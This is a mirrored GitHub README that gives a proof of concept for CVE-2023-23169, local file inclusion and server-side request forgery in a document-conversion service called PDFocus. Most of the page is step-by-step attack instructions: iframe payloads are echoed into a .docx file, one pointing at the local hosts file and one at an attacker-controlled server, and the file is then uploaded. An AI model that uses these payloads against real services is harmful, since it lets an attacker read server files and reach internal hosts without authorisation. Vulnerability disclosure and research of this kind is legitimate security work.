Giters

S4nshine / CVE-2023-23169

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2023-23169

POC for CVE-2023-23169 Local File inclusion & Server side request Forgery

Steps to reproduce :

Local File Incusion :

  1. echo "<iframe src=file://etc/hosts></iframe>" > poc.docx
  2. Upload the file in PDFocus services
  3. View/Download file after to triggered POC

SSRF :

  1. echo "<iframe src=http://your-server></iframe>" > poc.docx
  2. Upload the file in PDFocus services
  3. View/Download file to see triggered POC

Demo :

Screenshot 2023-05-01 at 4 20 28 PM

demo2 demo4

demo3

About